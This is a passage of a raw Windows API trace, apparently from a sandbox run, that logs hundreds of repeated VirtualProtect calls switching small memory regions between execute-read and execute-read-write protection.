lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.855] VirtualProtect (in: lpAddress=0x1e8bc88, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.855] VirtualProtect (in: lpAddress=0x1e8bc90, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.855] VirtualProtect (in: lpAddress=0x1e8bc90, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.855] VirtualProtect (in: lpAddress=0x1e8bc94, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.855] VirtualProtect (in: lpAddress=0x1e8bc94, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bca0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bca0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bcc0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bcc0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bce0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.856] VirtualProtect (in: lpAddress=0x1e8bce0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.857] VirtualProtect (in: lpAddress=0x1e8bce8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.857] VirtualProtect (in: lpAddress=0x1e8bce8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.857] VirtualProtect (in: lpAddress=0x1e8bcec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.857] VirtualProtect (in: lpAddress=0x1e8bcec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.857] VirtualProtect (in: lpAddress=0x1e8bd08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd10, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd10, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd14, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd14, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.858] VirtualProtect (in: lpAddress=0x1e8bd30, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.859] VirtualProtect (in: lpAddress=0x1e8bd30, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.859] VirtualProtect (in: lpAddress=0x1e8bd4c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.859] VirtualProtect (in: lpAddress=0x1e8bd4c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.859] VirtualProtect (in: lpAddress=0x1e8bd50, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.859] VirtualProtect (in: lpAddress=0x1e8bd50, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd6c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd6c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd70, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd70, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd90, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.860] VirtualProtect (in: lpAddress=0x1e8bd90, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.861] VirtualProtect (in: lpAddress=0x1e8bdac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.861] VirtualProtect (in: lpAddress=0x1e8bdac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.861] VirtualProtect (in: lpAddress=0x1e8bdb0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.861] VirtualProtect (in: lpAddress=0x1e8bdb0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.861] VirtualProtect (in: lpAddress=0x1e8bdd0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8bdd0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8bddc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8bddc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8bde8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8bde8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.862] VirtualProtect (in: lpAddress=0x1e8be08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.863] VirtualProtect (in: lpAddress=0x1e8be08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.863] VirtualProtect (in: lpAddress=0x1e8be14, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.863] VirtualProtect (in: lpAddress=0x1e8be14, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.863] VirtualProtect (in: lpAddress=0x1e8be20, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.863] VirtualProtect (in: lpAddress=0x1e8be20, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be40, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be40, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be4c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be4c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be58, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.864] VirtualProtect (in: lpAddress=0x1e8be58, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.865] VirtualProtect (in: lpAddress=0x1e8be74, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.865] VirtualProtect (in: lpAddress=0x1e8be74, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.865] VirtualProtect (in: lpAddress=0x1e8be78, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.865] VirtualProtect (in: lpAddress=0x1e8be78, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.865] VirtualProtect (in: lpAddress=0x1e8be94, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.866] VirtualProtect (in: lpAddress=0x1e8be94, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.866] VirtualProtect (in: lpAddress=0x1e8be98, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.866] VirtualProtect (in: lpAddress=0x1e8be98, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.866] VirtualProtect (in: lpAddress=0x1e8beb8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.866] VirtualProtect (in: lpAddress=0x1e8beb8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.867] VirtualProtect (in: lpAddress=0x1e8bec4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.867] VirtualProtect (in: lpAddress=0x1e8bec4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.867] VirtualProtect (in: lpAddress=0x1e8bed0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.867] VirtualProtect (in: lpAddress=0x1e8bed0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.867] VirtualProtect (in: lpAddress=0x1e8bedc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bedc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bef8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bef8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bf14, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bf14, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.868] VirtualProtect (in: lpAddress=0x1e8bf18, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.869] VirtualProtect (in: lpAddress=0x1e8bf18, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.869] VirtualProtect (in: lpAddress=0x1e8bf34, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.869] VirtualProtect (in: lpAddress=0x1e8bf34, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.869] VirtualProtect (in: lpAddress=0x1e8bf38, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.869] VirtualProtect (in: lpAddress=0x1e8bf38, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf58, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf58, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf64, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf64, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf7c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.870] VirtualProtect (in: lpAddress=0x1e8bf7c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.871] VirtualProtect (in: lpAddress=0x1e8bf80, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.871] VirtualProtect (in: lpAddress=0x1e8bf80, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.871] VirtualProtect (in: lpAddress=0x1e8bf9c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.871] VirtualProtect (in: lpAddress=0x1e8bf9c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.871] VirtualProtect (in: lpAddress=0x1e8bfa0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfa0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfbc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfbc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfc0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfc0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.872] VirtualProtect (in: lpAddress=0x1e8bfc8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.873] VirtualProtect (in: lpAddress=0x1e8bfc8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.873] VirtualProtect (in: lpAddress=0x1e8bfcc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.873] VirtualProtect (in: lpAddress=0x1e8bfcc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.873] VirtualProtect (in: lpAddress=0x1e8bfe4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.873] VirtualProtect (in: lpAddress=0x1e8bfe4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.874] VirtualProtect (in: lpAddress=0x1e8bfe8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.874] VirtualProtect (in: lpAddress=0x1e8bfe8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.874] VirtualProtect (in: lpAddress=0x1e8c004, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.874] VirtualProtect (in: lpAddress=0x1e8c004, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.874] VirtualProtect (in: lpAddress=0x1e8c008, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c008, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c024, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c024, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c028, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c028, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.875] VirtualProtect (in: lpAddress=0x1e8c044, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.876] VirtualProtect (in: lpAddress=0x1e8c044, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.876] VirtualProtect (in: lpAddress=0x1e8c048, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.876] VirtualProtect (in: lpAddress=0x1e8c048, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.876] VirtualProtect (in: lpAddress=0x1e8c068, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.876] VirtualProtect (in: lpAddress=0x1e8c068, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c088, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c088, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c090, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c090, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c094, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.877] VirtualProtect (in: lpAddress=0x1e8c094, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.878] VirtualProtect (in: lpAddress=0x1e8c09c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.878] VirtualProtect (in: lpAddress=0x1e8c09c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.878] VirtualProtect (in: lpAddress=0x1e8c0a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.878] VirtualProtect (in: lpAddress=0x1e8c0a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.878] VirtualProtect (in: lpAddress=0x1e8c0bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.879] VirtualProtect (in: lpAddress=0x1e8c0bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.879] VirtualProtect (in: lpAddress=0x1e8c0c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.879] VirtualProtect (in: lpAddress=0x1e8c0c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.879] VirtualProtect (in: lpAddress=0x1e8c0e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.879] VirtualProtect (in: lpAddress=0x1e8c0e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.880] VirtualProtect (in: lpAddress=0x1e8c100, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.880] VirtualProtect (in: lpAddress=0x1e8c100, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.880] VirtualProtect (in: lpAddress=0x1e8c108, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.880] VirtualProtect (in: lpAddress=0x1e8c108, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.880] VirtualProtect (in: lpAddress=0x1e8c10c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c10c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c114, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c114, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c118, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c118, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.881] VirtualProtect (in: lpAddress=0x1e8c138, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.882] VirtualProtect (in: lpAddress=0x1e8c138, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.882] VirtualProtect (in: lpAddress=0x1e8c154, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.882] VirtualProtect (in: lpAddress=0x1e8c154, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.882] VirtualProtect (in: lpAddress=0x1e8c158, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.882] VirtualProtect (in: lpAddress=0x1e8c158, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.883] VirtualProtect (in: lpAddress=0x1e8c160, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) 